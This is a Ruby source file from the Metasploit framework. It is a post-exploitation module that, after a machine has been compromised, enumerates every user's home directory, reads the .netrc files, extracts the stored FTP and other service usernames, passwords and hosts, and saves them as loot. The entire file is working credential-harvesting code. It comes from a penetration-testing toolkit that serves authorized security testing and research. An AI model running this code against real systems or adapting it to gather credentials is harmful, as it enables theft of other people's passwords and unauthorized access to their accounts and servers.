metasploit-framework/modules/post/multi/gather/netrc_creds.rb

105 lines
2.7 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(
update_info(
info,
'Name' => 'UNIX Gather .netrc Credentials',
'Description' => %q{
Post Module to obtain credentials saved for FTP and other services in .netrc
},
'License' => MSF_LICENSE,
'Author' => [ 'Jon Hart <jhart[at]spoofed.org>' ],
'Platform' => %w[bsd linux osx unix],
'SessionTypes' => [ 'shell' ]
)
)
end
def run
# A table to store the found credentials.
cred_table = Rex::Text::Table.new(
'Header' => '.netrc credentials',
'Indent' => 1,
'Columns' =>
[
'Username',
'Password',
'Server',
]
)
# all of the credentials we've found from .netrc
creds = []
# walk through each user directory
print_status('Enumerating .netrc files')
enum_user_directories.each do |user_dir|
netrc_file = user_dir + '/.netrc'
# the current credential from .netrc we are parsing
cred = {}
# read their .netrc
unless readable? netrc_file
vprint_error("Couldn't read #{netrc_file}")
next
end
print_status("Reading: #{netrc_file}")
read_file(netrc_file).each_line do |netrc_line|
# parse it
netrc_line.strip!
# get the machine name
if (netrc_line =~ /machine (\S+)/)
# if we've already found a machine, save this cred and start over
if (cred[:host])
creds << cred
cred = {}
end
cred[:host] = ::Regexp.last_match(1)
end
# get the user name
if (netrc_line =~ /login (\S+)/)
cred[:user] = ::Regexp.last_match(1)
end
# get the password
if (netrc_line =~ /password (\S+)/)
cred[:pass] = ::Regexp.last_match(1)
end
end
# save whatever remains of this last cred if it is worth saving
creds << cred if (cred[:host] && cred[:user] && cred[:pass])
end
# print out everything we've found
creds.each do |cred|
cred_table << [ cred[:user], cred[:pass], cred[:host] ]
end
if cred_table.rows.empty?
print_status('No creds collected')
else
print_line("\n" + cred_table.to_s)
# store all found credentials
p = store_loot(
'netrc.creds',
'text/csv',
session,
cred_table.to_csv,
'netrc_credentials.txt',
'.netrc credentials'
)
print_status("Credentials stored in: #{p}")
end
end
end